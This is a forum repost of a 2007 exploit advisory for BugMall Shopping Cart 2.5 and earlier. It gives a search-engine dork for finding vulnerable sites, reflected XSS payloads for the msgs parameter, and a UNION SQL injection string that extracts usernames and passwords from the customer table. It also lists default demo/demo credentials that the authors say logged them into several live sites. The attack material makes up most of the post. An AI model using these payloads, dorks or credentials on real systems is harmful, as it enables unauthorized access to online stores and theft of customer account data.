Jump to content
hex

BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vuln

By hex, in Exploituri

Recommended Posts

hex Newbie

hex

Posted
Posted

--==+================================================================================+==--

--==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==--

--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)

SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip

ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834

SITE: http://www.bug-mall.org

DORK: Powered by Bug Software intext:Your Cart Contains

EXPLOITS:

EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[html, JAVASCRIPT]

EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.

EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites

and sucsefully logged in.

EXAMPLES:

EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY

t0pP8uZz

h4cky0u.org</body><html>

EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>

EXAMPLE 3: Paste following into search box

' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*

Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

FROM GM!: Kw3[R]ln get over it :D.

--==+================================================================================+==--

--==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==--

--==+================================================================================+==--

# milw0rm.com [2007-06-25]

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...